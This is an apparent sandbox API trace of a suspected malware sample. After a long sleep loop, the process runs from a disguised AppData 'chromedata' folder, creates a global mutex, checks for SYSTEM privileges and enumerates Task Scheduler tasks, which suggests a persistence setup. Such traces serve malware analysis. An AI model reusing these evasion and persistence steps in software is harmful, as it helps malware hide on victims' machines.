	[0069.047] Sleep (dwMilliseconds=0x1) 
	[0069.062] GetLastError () returned 0x0
	[0069.062] Sleep (dwMilliseconds=0x1) 
	[0069.085] GetLastError () returned 0x0
	[0069.085] Sleep (dwMilliseconds=0x1) 
	[0069.094] GetLastError () returned 0x0
	[0069.094] Sleep (dwMilliseconds=0x1) 
	[0069.109] GetLastError () returned 0x0
	[0069.109] Sleep (dwMilliseconds=0x1) 
	[0069.124] GetLastError () returned 0x0
	[0069.124] Sleep (dwMilliseconds=0x1) 
	[0069.140] GetLastError () returned 0x0
	[0069.140] Sleep (dwMilliseconds=0x1) 
	[0069.155] GetLastError () returned 0x0
	[0069.155] Sleep (dwMilliseconds=0x1) 
	[0069.171] GetLastError () returned 0x0
	[0069.171] Sleep (dwMilliseconds=0x1) 
	[0069.190] GetLastError () returned 0x0
	[0069.190] Sleep (dwMilliseconds=0x1) 
	[0069.202] GetLastError () returned 0x0
	[0069.202] Sleep (dwMilliseconds=0x1) 
	[0069.218] GetLastError () returned 0x0
	[0069.218] Sleep (dwMilliseconds=0x1) 
	[0069.237] GetLastError () returned 0x0
	[0069.237] Sleep (dwMilliseconds=0x1) 
	[0069.256] GetLastError () returned 0x0
	[0069.256] Sleep (dwMilliseconds=0x1) 
	[0069.265] GetLastError () returned 0x0
	[0069.265] Sleep (dwMilliseconds=0x1) 
	[0069.280] GetLastError () returned 0x0
	[0069.280] Sleep (dwMilliseconds=0x1) 
	[0069.296] GetLastError () returned 0x0
	[0069.296] Sleep (dwMilliseconds=0x1) 
	[0069.313] GetLastError () returned 0x0
	[0069.313] Sleep (dwMilliseconds=0x1) 
	[0069.327] GetLastError () returned 0x0
	[0069.327] Sleep (dwMilliseconds=0x1) 
	[0069.342] GetLastError () returned 0x0
	[0069.343] Sleep (dwMilliseconds=0x1) 
	[0069.359] GetLastError () returned 0x0
	[0069.359] Sleep (dwMilliseconds=0x1) 
	[0069.374] GetLastError () returned 0x0
	[0069.374] Sleep (dwMilliseconds=0x1) 
	[0069.389] GetLastError () returned 0x0
	[0069.389] Sleep (dwMilliseconds=0x1) 
	[0069.405] GetLastError () returned 0x0
	[0069.405] Sleep (dwMilliseconds=0x1) 
	[0069.421] GetLastError () returned 0x0
	[0069.421] Sleep (dwMilliseconds=0x1) 
	[0069.440] GetLastError () returned 0x0
	[0069.440] Sleep (dwMilliseconds=0x1) 
	[0069.452] GetLastError () returned 0x0
	[0069.452] Sleep (dwMilliseconds=0x1) 
	[0069.468] GetLastError () returned 0x0
	[0069.468] Sleep (dwMilliseconds=0x1) 
	[0069.483] GetLastError () returned 0x0
	[0069.483] Sleep (dwMilliseconds=0x1) 
	[0069.499] GetLastError () returned 0x0
	[0069.499] Sleep (dwMilliseconds=0x1) 
	[0069.514] GetLastError () returned 0x0
	[0069.514] Sleep (dwMilliseconds=0x1) 
	[0069.530] GetLastError () returned 0x0
	[0069.530] Sleep (dwMilliseconds=0x1) 
	[0069.546] GetLastError () returned 0x0
	[0069.546] Sleep (dwMilliseconds=0x1) 
	[0069.561] GetLastError () returned 0x0
	[0069.561] Sleep (dwMilliseconds=0x1) 
	[0069.583] GetLastError () returned 0x0
	[0069.583] Sleep (dwMilliseconds=0x1) 
	[0069.592] GetLastError () returned 0x0
	[0069.592] Sleep (dwMilliseconds=0x1) 
	[0069.608] GetLastError () returned 0x0
	[0069.608] Sleep (dwMilliseconds=0x1) 
	[0069.623] GetLastError () returned 0x0
	[0069.623] Sleep (dwMilliseconds=0x1) 
	[0069.639] GetLastError () returned 0x0
	[0069.639] Sleep (dwMilliseconds=0x1) 
	[0069.654] GetLastError () returned 0x0
	[0069.655] Sleep (dwMilliseconds=0x1) 
	[0069.671] GetLastError () returned 0x0
	[0069.671] Sleep (dwMilliseconds=0x1) 
	[0069.686] GetLastError () returned 0x0
	[0069.686] Sleep (dwMilliseconds=0x1) 
	[0069.701] GetLastError () returned 0x0
	[0069.701] Sleep (dwMilliseconds=0x1) 
	[0069.717] GetLastError () returned 0x0
	[0069.717] Sleep (dwMilliseconds=0x1) 
	[0069.733] GetLastError () returned 0x0
	[0069.733] Sleep (dwMilliseconds=0x1) 
	[0069.748] GetLastError () returned 0x0
	[0069.748] Sleep (dwMilliseconds=0x1) 
	[0069.764] GetLastError () returned 0x0
	[0069.764] Sleep (dwMilliseconds=0x1) 
	[0069.779] GetLastError () returned 0x0
	[0069.779] Sleep (dwMilliseconds=0x1) 
	[0069.795] GetLastError () returned 0x0
	[0069.795] Sleep (dwMilliseconds=0x1) 
	[0069.811] GetLastError () returned 0x0
	[0069.811] Sleep (dwMilliseconds=0x1) 
	[0069.845] GetLastError () returned 0x0
	[0069.845] Sleep (dwMilliseconds=0x1) 
	[0069.858] GetLastError () returned 0x0
	[0069.858] Sleep (dwMilliseconds=0x1) 
	[0069.873] GetLastError () returned 0x0
	[0069.873] Sleep (dwMilliseconds=0x1) 
	[0069.889] GetLastError () returned 0x0
	[0069.889] Sleep (dwMilliseconds=0x1) 
	[0069.909] GetLastError () returned 0x0
	[0069.909] Sleep (dwMilliseconds=0x1) 
	[0069.921] GetLastError () returned 0x0
	[0069.921] Sleep (dwMilliseconds=0x1) 
	[0069.936] GetLastError () returned 0x0
	[0069.936] Sleep (dwMilliseconds=0x1) 
	[0069.951] GetLastError () returned 0x0
	[0069.951] Sleep (dwMilliseconds=0x1) 
	[0069.967] GetLastError () returned 0x0
	[0069.967] Sleep (dwMilliseconds=0x1) 
	[0069.982] GetLastError () returned 0x0
	[0069.982] Sleep (dwMilliseconds=0x1) 
	[0069.998] GetLastError () returned 0x0
	[0069.998] Sleep (dwMilliseconds=0x1) 
	[0070.014] GetLastError () returned 0x0
	[0070.014] Sleep (dwMilliseconds=0x1) 
	[0070.029] GetLastError () returned 0x0
	[0070.029] Sleep (dwMilliseconds=0x1) 
	[0070.045] GetLastError () returned 0x0
	[0070.045] Sleep (dwMilliseconds=0x1) 
	[0070.061] GetLastError () returned 0x0
	[0070.061] Sleep (dwMilliseconds=0x1) 
	[0070.082] GetLastError () returned 0x0
	[0070.082] Sleep (dwMilliseconds=0x1) 
	[0070.091] GetLastError () returned 0x0
	[0070.091] Sleep (dwMilliseconds=0x1) 
	[0070.107] GetLastError () returned 0x0
	[0070.107] Sleep (dwMilliseconds=0x1) 
	[0070.123] GetLastError () returned 0x0
	[0070.123] Sleep (dwMilliseconds=0x1) 
	[0070.138] GetLastError () returned 0x0
	[0070.138] Sleep (dwMilliseconds=0x1) 
	[0070.154] GetLastError () returned 0x0
	[0070.154] Sleep (dwMilliseconds=0x1) 
	[0070.171] GetLastError () returned 0x0
	[0070.171] Sleep (dwMilliseconds=0x1) 
	[0070.185] GetLastError () returned 0x0
	[0070.185] Sleep (dwMilliseconds=0x1) 
	[0070.200] GetLastError () returned 0x0
	[0070.200] Sleep (dwMilliseconds=0x1) 
	[0070.216] GetLastError () returned 0x0
	[0070.216] Sleep (dwMilliseconds=0x1) 
	[0070.249] GetLastError () returned 0x0
	[0070.249] Sleep (dwMilliseconds=0x1) 
	[0070.263] GetLastError () returned 0x0
	[0070.263] Sleep (dwMilliseconds=0x1) 
	[0070.279] GetLastError () returned 0x0
	[0070.279] Sleep (dwMilliseconds=0x1) 
	[0070.294] GetLastError () returned 0x0
	[0070.294] Sleep (dwMilliseconds=0x1) 
	[0070.310] GetLastError () returned 0x0
	[0070.310] Sleep (dwMilliseconds=0x1) 
	[0070.325] GetLastError () returned 0x0
	[0070.325] Sleep (dwMilliseconds=0x1) 
	[0070.341] GetLastError () returned 0x0
	[0070.341] Sleep (dwMilliseconds=0x1) 
	[0070.357] GetLastError () returned 0x0
	[0070.357] Sleep (dwMilliseconds=0x1) 
	[0070.372] GetLastError () returned 0x0
	[0070.372] Sleep (dwMilliseconds=0x1) 
	[0070.388] GetLastError () returned 0x0
	[0070.388] Sleep (dwMilliseconds=0x1) 
	[0070.403] GetLastError () returned 0x0
	[0070.403] Sleep (dwMilliseconds=0x1) 
	[0070.419] GetLastError () returned 0x0
	[0070.419] Sleep (dwMilliseconds=0x1) 
	[0070.435] GetLastError () returned 0x0
	[0070.435] Sleep (dwMilliseconds=0x1) 
	[0070.450] GetLastError () returned 0x0
	[0070.450] Sleep (dwMilliseconds=0x1) 
	[0070.466] GetLastError () returned 0x0
	[0070.466] Sleep (dwMilliseconds=0x1) 
	[0070.481] GetLastError () returned 0x0
	[0070.481] Sleep (dwMilliseconds=0x1) 
	[0070.497] GetLastError () returned 0x0
	[0070.497] Sleep (dwMilliseconds=0x1) 
	[0070.512] GetLastError () returned 0x0
	[0070.513] Sleep (dwMilliseconds=0x1) 
	[0070.528] GetLastError () returned 0x0
	[0070.528] Sleep (dwMilliseconds=0x1) 
	[0070.544] GetLastError () returned 0x0
	[0070.544] Sleep (dwMilliseconds=0x1) 
	[0070.559] GetLastError () returned 0x0
	[0070.559] Sleep (dwMilliseconds=0x1) 
	[0070.575] GetLastError () returned 0x0
	[0070.575] Sleep (dwMilliseconds=0x1) 
	[0070.591] GetLastError () returned 0x0
	[0070.591] Sleep (dwMilliseconds=0x1) 
	[0070.606] GetLastError () returned 0x0
	[0070.606] Sleep (dwMilliseconds=0x1) 
	[0070.623] GetLastError () returned 0x0
	[0070.623] Sleep (dwMilliseconds=0x1) 
	[0070.637] GetLastError () returned 0x0
	[0070.637] Sleep (dwMilliseconds=0x1) 
	[0070.653] GetLastError () returned 0x0
	[0070.653] Sleep (dwMilliseconds=0x1) 
	[0070.668] GetLastError () returned 0x0
	[0070.669] Sleep (dwMilliseconds=0x1) 
	[0070.685] GetLastError () returned 0x0
	[0070.685] Sleep (dwMilliseconds=0x1) 
	[0070.700] GetLastError () returned 0x0
	[0070.700] Sleep (dwMilliseconds=0x1) 
	[0070.716] GetLastError () returned 0x0
	[0070.716] Sleep (dwMilliseconds=0x1) 
	[0070.731] GetLastError () returned 0x0
	[0070.731] Sleep (dwMilliseconds=0x1) 
	[0070.747] GetLastError () returned 0x0
	[0070.747] Sleep (dwMilliseconds=0x1) 
	[0070.769] GetLastError () returned 0x0
	[0070.769] Sleep (dwMilliseconds=0x1) 
	[0070.778] GetLastError () returned 0x0
	[0070.778] Sleep (dwMilliseconds=0x1) 
	[0070.794] GetLastError () returned 0x0
	[0070.794] Sleep (dwMilliseconds=0x1) 
	[0070.809] GetLastError () returned 0x0
	[0070.809] Sleep (dwMilliseconds=0x1) 
	[0070.825] GetLastError () returned 0x0
	[0070.825] Sleep (dwMilliseconds=0x1) 
	[0070.848] GetLastError () returned 0x0
	[0070.848] Sleep (dwMilliseconds=0x1) 
	[0070.856] GetLastError () returned 0x0
	[0070.856] Sleep (dwMilliseconds=0x1) 
	[0070.872] GetLastError () returned 0x0
	[0070.872] Sleep (dwMilliseconds=0x1) 
	[0070.887] GetLastError () returned 0x0
	[0070.887] Sleep (dwMilliseconds=0x1) 
	[0070.903] GetLastError () returned 0x0
	[0070.903] Sleep (dwMilliseconds=0x1) 
	[0070.919] GetLastError () returned 0x0
	[0070.919] Sleep (dwMilliseconds=0x1) 
	[0070.934] GetLastError () returned 0x0
	[0070.934] Sleep (dwMilliseconds=0x1) 
	[0070.949] GetLastError () returned 0x0
	[0070.949] Sleep (dwMilliseconds=0x1) 
	[0070.965] GetLastError () returned 0x0
	[0070.965] Sleep (dwMilliseconds=0x1) 
	[0070.980] GetLastError () returned 0x0
	[0070.980] Sleep (dwMilliseconds=0x1) 
	[0070.996] GetLastError () returned 0x0
	[0070.996] Sleep (dwMilliseconds=0x1) 
	[0071.023] GetLastError () returned 0x0
	[0071.023] Sleep (dwMilliseconds=0x1) 
	[0071.027] GetLastError () returned 0x0
	[0071.027] Sleep (dwMilliseconds=0x1) 
	[0071.043] GetLastError () returned 0x0
	[0071.043] Sleep (dwMilliseconds=0x1) 
	[0071.059] GetLastError () returned 0x0
	[0071.059] Sleep (dwMilliseconds=0x1) 
	[0071.084] GetLastError () returned 0x0
	[0071.084] Sleep (dwMilliseconds=0x1) 
	[0071.091] GetLastError () returned 0x0
	[0071.091] Sleep (dwMilliseconds=0x1) 
	[0071.105] GetLastError () returned 0x0
	[0071.105] Sleep (dwMilliseconds=0x1) 
	[0071.121] GetLastError () returned 0x0
	[0071.121] Sleep (dwMilliseconds=0x1) 
	[0071.138] GetLastError () returned 0x0
	[0071.138] Sleep (dwMilliseconds=0x1) 
	[0071.152] GetLastError () returned 0x0
	[0071.152] Sleep (dwMilliseconds=0x1) 
	[0071.168] GetLastError () returned 0x0
	[0071.168] Sleep (dwMilliseconds=0x1) 
	[0071.183] GetLastError () returned 0x0
	[0071.183] Sleep (dwMilliseconds=0x1) 
	[0071.199] GetLastError () returned 0x0
	[0071.199] Sleep (dwMilliseconds=0x1) 
	[0071.214] GetLastError () returned 0x0
	[0071.215] Sleep (dwMilliseconds=0x1) 
	[0071.230] GetLastError () returned 0x0
	[0071.230] Sleep (dwMilliseconds=0x1) 
	[0071.246] GetLastError () returned 0x0
	[0071.246] Sleep (dwMilliseconds=0x1) 
	[0071.264] GetLastError () returned 0x0
	[0071.264] Sleep (dwMilliseconds=0x1) 
	[0071.277] GetLastError () returned 0x0
	[0071.277] Sleep (dwMilliseconds=0x1) 
	[0071.292] GetLastError () returned 0x0
	[0071.292] Sleep (dwMilliseconds=0x1) 
	[0071.308] GetLastError () returned 0x0
	[0071.308] Sleep (dwMilliseconds=0x1) 
	[0071.324] GetLastError () returned 0x0
	[0071.324] Sleep (dwMilliseconds=0x1) 
	[0071.339] GetLastError () returned 0x0
	[0071.339] Sleep (dwMilliseconds=0x1) 
	[0071.355] GetLastError () returned 0x0
	[0071.355] Sleep (dwMilliseconds=0x1) 
	[0071.370] GetLastError () returned 0x0
	[0071.370] Sleep (dwMilliseconds=0x1) 
	[0071.386] GetLastError () returned 0x0
	[0071.386] Sleep (dwMilliseconds=0x1) 
	[0071.402] GetLastError () returned 0x0
	[0071.402] Sleep (dwMilliseconds=0x1) 
	[0071.417] GetLastError () returned 0x0
	[0071.417] Sleep (dwMilliseconds=0x1) 
	[0071.433] GetLastError () returned 0x0
	[0071.433] Sleep (dwMilliseconds=0x1) 
	[0071.449] GetLastError () returned 0x0
	[0071.449] Sleep (dwMilliseconds=0x1) 
	[0071.464] GetLastError () returned 0x0
	[0071.464] Sleep (dwMilliseconds=0x1) 
	[0071.481] GetLastError () returned 0x0
	[0071.481] Sleep (dwMilliseconds=0x1) 
	[0071.495] GetLastError () returned 0x0
	[0071.495] Sleep (dwMilliseconds=0x1) 
	[0071.511] GetLastError () returned 0x0
	[0071.511] Sleep (dwMilliseconds=0x1) 
	[0071.527] GetLastError () returned 0x0
	[0071.527] Sleep (dwMilliseconds=0x1) 
	[0071.542] GetLastError () returned 0x0
	[0071.542] Sleep (dwMilliseconds=0x1) 
	[0071.558] GetLastError () returned 0x0
	[0071.558] Sleep (dwMilliseconds=0x1) 
	[0071.574] GetLastError () returned 0x0
	[0071.574] Sleep (dwMilliseconds=0x1) 
	[0071.589] GetLastError () returned 0x0
	[0071.589] Sleep (dwMilliseconds=0x1) 
	[0071.605] GetLastError () returned 0x0
	[0071.605] Sleep (dwMilliseconds=0x1) 
	[0071.620] GetLastError () returned 0x0
	[0071.620] Sleep (dwMilliseconds=0x1) 
	[0071.636] GetLastError () returned 0x0
	[0071.636] Sleep (dwMilliseconds=0x1) 
	[0071.652] GetLastError () returned 0x0
	[0071.652] Sleep (dwMilliseconds=0x1) 
	[0071.667] GetLastError () returned 0x0
	[0071.667] Sleep (dwMilliseconds=0x1) 
	[0071.683] GetLastError () returned 0x0
	[0071.683] Sleep (dwMilliseconds=0x1) 
	[0071.698] GetLastError () returned 0x0
	[0071.698] Sleep (dwMilliseconds=0x1) 
	[0071.714] GetLastError () returned 0x0
	[0071.714] Sleep (dwMilliseconds=0x1) 
	[0071.729] GetLastError () returned 0x0
	[0071.729] Sleep (dwMilliseconds=0x1) 
	[0071.745] GetLastError () returned 0x0
	[0071.745] Sleep (dwMilliseconds=0x1) 
	[0071.761] GetLastError () returned 0x0
	[0071.761] Sleep (dwMilliseconds=0x1) 
	[0071.777] GetLastError () returned 0x0
	[0071.777] Sleep (dwMilliseconds=0x1) 
	[0071.792] GetLastError () returned 0x0
	[0071.792] Sleep (dwMilliseconds=0x1) 
	[0071.808] GetLastError () returned 0x0
	[0071.808] Sleep (dwMilliseconds=0x1) 
	[0071.823] GetLastError () returned 0x0
	[0071.823] Sleep (dwMilliseconds=0x1) 
	[0071.839] GetLastError () returned 0x0
	[0071.839] Sleep (dwMilliseconds=0x1) 
	[0071.854] GetLastError () returned 0x0
	[0071.854] Sleep (dwMilliseconds=0x1) 
	[0071.871] GetLastError () returned 0x0
	[0071.871] Sleep (dwMilliseconds=0x1) 
	[0071.886] GetLastError () returned 0x0
	[0071.886] Sleep (dwMilliseconds=0x1) 
	[0071.902] GetLastError () returned 0x0
	[0071.902] Sleep (dwMilliseconds=0x1) 
	[0071.917] GetLastError () returned 0x0
	[0071.917] Sleep (dwMilliseconds=0x1) 
	[0071.932] GetLastError () returned 0x0
	[0071.932] Sleep (dwMilliseconds=0x1) 
	[0071.948] GetLastError () returned 0x0
	[0071.948] Sleep (dwMilliseconds=0x1) 
	[0071.964] GetLastError () returned 0x0
	[0071.964] Sleep (dwMilliseconds=0x1) 
	[0071.979] GetLastError () returned 0x0
	[0071.979] Sleep (dwMilliseconds=0x1) 
	[0071.995] GetLastError () returned 0x0
	[0071.995] Sleep (dwMilliseconds=0x1) 
	[0072.011] GetLastError () returned 0x0
	[0072.011] Sleep (dwMilliseconds=0x1) 
	[0072.026] GetLastError () returned 0x0
	[0072.026] Sleep (dwMilliseconds=0x1) 
	[0072.041] GetLastError () returned 0x0
	[0072.041] Sleep (dwMilliseconds=0x1) 
	[0072.057] GetLastError () returned 0x0
	[0072.057] Sleep (dwMilliseconds=0x1) 
	[0072.080] GetLastError () returned 0x0
	[0072.080] Sleep (dwMilliseconds=0x1) 
	[0072.088] GetLastError () returned 0x0
	[0072.088] Sleep (dwMilliseconds=0x1) 
	[0072.104] GetLastError () returned 0x0
	[0072.104] Sleep (dwMilliseconds=0x1) 
	[0072.120] GetLastError () returned 0x0
	[0072.120] Sleep (dwMilliseconds=0x1) 
	[0072.135] GetLastError () returned 0x0
	[0072.135] Sleep (dwMilliseconds=0x1) 
	[0072.151] GetLastError () returned 0x0
	[0072.151] Sleep (dwMilliseconds=0x1) 
	[0072.166] GetLastError () returned 0x0
	[0072.166] Sleep (dwMilliseconds=0x1) 
	[0072.182] GetLastError () returned 0x0
	[0072.182] Sleep (dwMilliseconds=0x1) 
	[0072.198] GetLastError () returned 0x0
	[0072.199] Sleep (dwMilliseconds=0x1) 
	[0072.213] GetLastError () returned 0x0
	[0072.213] Sleep (dwMilliseconds=0x1) 
	[0072.229] GetLastError () returned 0x0
	[0072.229] Sleep (dwMilliseconds=0x1) 
	[0072.244] GetLastError () returned 0x0
	[0072.244] Sleep (dwMilliseconds=0x1) 
	[0072.260] GetLastError () returned 0x0
	[0072.260] Sleep (dwMilliseconds=0x1) 
	[0072.275] GetLastError () returned 0x0
	[0072.275] Sleep (dwMilliseconds=0x1) 
	[0072.298] GetLastError () returned 0x0
	[0072.298] Sleep (dwMilliseconds=0x1) 
	[0072.308] GetLastError () returned 0x0
	[0072.308] Sleep (dwMilliseconds=0x1) 
	[0072.322] GetLastError () returned 0x0
	[0072.322] Sleep (dwMilliseconds=0x1) 
	[0072.338] GetLastError () returned 0x0
	[0072.338] Sleep (dwMilliseconds=0x1) 
	[0072.353] GetLastError () returned 0x0
	[0072.353] Sleep (dwMilliseconds=0x1) 
	[0072.369] GetLastError () returned 0x0
	[0072.369] Sleep (dwMilliseconds=0x1) 
	[0072.385] GetLastError () returned 0x0
	[0072.385] Sleep (dwMilliseconds=0x1) 
	[0072.400] GetLastError () returned 0x0
	[0072.400] Sleep (dwMilliseconds=0x1) 
	[0072.416] GetLastError () returned 0x0
	[0072.416] Sleep (dwMilliseconds=0x1) 
	[0072.431] GetLastError () returned 0x0
	[0072.431] Sleep (dwMilliseconds=0x1) 
	[0072.447] GetLastError () returned 0x0
	[0072.447] Sleep (dwMilliseconds=0x1) 
	[0072.463] GetLastError () returned 0x0
	[0072.463] Sleep (dwMilliseconds=0x1) 
	[0072.478] GetLastError () returned 0x0
	[0072.478] Sleep (dwMilliseconds=0x1) 
	[0072.494] GetLastError () returned 0x0
	[0072.494] Sleep (dwMilliseconds=0x1) 
	[0072.509] GetLastError () returned 0x0
	[0072.509] Sleep (dwMilliseconds=0x1) 
	[0072.525] GetLastError () returned 0x0
	[0072.525] Sleep (dwMilliseconds=0x1) 
	[0072.541] GetLastError () returned 0x0
	[0072.541] Sleep (dwMilliseconds=0x1) 
	[0072.557] GetLastError () returned 0x0
	[0072.557] Sleep (dwMilliseconds=0x1) 
	[0072.572] GetLastError () returned 0x0
	[0072.572] Sleep (dwMilliseconds=0x1) 
	[0072.589] GetLastError () returned 0x0
	[0072.589] Sleep (dwMilliseconds=0x1) 
	[0072.603] GetLastError () returned 0x0
	[0072.603] Sleep (dwMilliseconds=0x1) 
	[0072.619] GetLastError () returned 0x0
	[0072.619] Sleep (dwMilliseconds=0x1) 
	[0072.634] GetLastError () returned 0x0
	[0072.634] Sleep (dwMilliseconds=0x1) 
	[0072.650] GetLastError () returned 0x0
	[0072.650] Sleep (dwMilliseconds=0x1) 
	[0072.666] GetLastError () returned 0x0
	[0072.666] Sleep (dwMilliseconds=0x1) 
	[0072.681] GetLastError () returned 0x0
	[0072.681] Sleep (dwMilliseconds=0x1) 
	[0072.697] GetLastError () returned 0x0
	[0072.697] Sleep (dwMilliseconds=0x1) 
	[0072.712] GetLastError () returned 0x0
	[0072.712] Sleep (dwMilliseconds=0x1) 
	[0072.728] GetLastError () returned 0x0
	[0072.728] Sleep (dwMilliseconds=0x1) 
	[0072.743] GetLastError () returned 0x0
	[0072.743] Sleep (dwMilliseconds=0x1) 
	[0072.759] GetLastError () returned 0x0
	[0072.759] Sleep (dwMilliseconds=0x1) 
	[0072.775] GetLastError () returned 0x0
	[0072.775] Sleep (dwMilliseconds=0x1) 
	[0072.790] GetLastError () returned 0x0
	[0072.790] Sleep (dwMilliseconds=0x1) 
	[0072.806] GetLastError () returned 0x0
	[0072.806] Sleep (dwMilliseconds=0x1) 
	[0072.821] GetLastError () returned 0x0
	[0072.821] Sleep (dwMilliseconds=0x1) 
	[0072.837] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x129510, nSize=0x200 | out: lpFilename="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe")) returned 0x3d
	[0072.837] Sleep (dwMilliseconds=0x1) 
	[0072.862] PathRemoveFileSpecW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 1
	[0072.862] Sleep (dwMilliseconds=0x1) 
	[0072.868] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\") returned=""
	[0072.868] GetProcessHeap () returned 0x150000
	[0072.868] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x110) returned 0x1a0cf8
	[0072.868] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a0cf8, nSize=0x104 | out: lpFilename="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe")) returned 0x3d
	[0072.869] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 1
	[0072.869] RtlAddVectoredExceptionHandler (FirstHandler=0x0, VectoredHandler=0x1a73370) returned 0x16e8a0
	[0072.869] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0072.871] GetWindowsDirectoryW (in: lpBuffer=0x129118, uSize=0x208 | out: lpBuffer="C:\\Windows") returned 0xa
	[0072.871] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x129408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x129408*=0x64285303, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0072.871] CreateMutexW (lpMutexAttributes=0x1294ec, bInitialOwner=1, lpName="Global\\C850A606981932960") returned 0x8
	[0072.871] LocalFree (hMem=0x183f70) returned 0x0
	[0072.872] GetLastError () returned 0x0
	[0072.872] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0072.873] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0072.878] GetCurrentProcess () returned 0xffffffff
	[0072.878] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x1294f4 | out: TokenHandle=0x1294f4*=0x1b0) returned 1
	[0072.878] GetTokenInformation (in: TokenHandle=0x1b0, TokenInformationClass=0x1, TokenInformation=0x12949c, TokenInformationLength=0x4c, ReturnLength=0x1294f0 | out: TokenInformation=0x12949c, ReturnLength=0x1294f0) returned 1
	[0072.879] AllocateAndInitializeSid (in: pIdentifierAuthority=0x1294e8, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x1294f8 | out: pSid=0x1294f8*=0x177618*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
	[0072.879] EqualSid (pSid1=0x1294a4*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), pSid2=0x177618*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0
	[0072.879] CloseHandle (hObject=0x1b0) returned 1
	[0072.879] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x400) returned 0x19b7f0
	[0072.879] GetVersion () returned 0x1db10106
	[0072.879] CoCreateInstance (in: rclsid=0x1a86b74*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1a86c38*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x1a86b58 | out: ppv=0x1a86b58*=0x552808) returned 0x0
	[0073.071] TaskScheduler:ITaskService:Connect (This=0x552808, serverName=0x129168*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x129178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x129188*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x129198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0
	[0073.075] TaskScheduler:ITaskService:GetFolder (in: This=0x552808, Path=0x0, ppFolder=0x1294f0 | out: ppFolder=0x1294f0*=0x552918) returned 0x0
	[0073.077] ITaskFolder:GetTasks (in: This=0x552918, flags=1, ppTasks=0x129188 | out: ppTasks=0x129188*=0x552948) returned 0x0
	[0073.080] IRegisteredTaskCollection:get_Count (in: This=0x552948, pCount=0x129178 | out: pCount=0x129178*=2) returned 0x0
	[0073.080] IRegisteredTaskCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x55, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x129180 | out: ppRegisteredTask=0x129180*=0x552308) returned 0x0
	[0073.080] IRegisteredTask:get_Name (in: This=0x552308, pName=0x129184 | out: pName=0x129184*="GoogleUpdateTaskMachineCore") returned 0x0
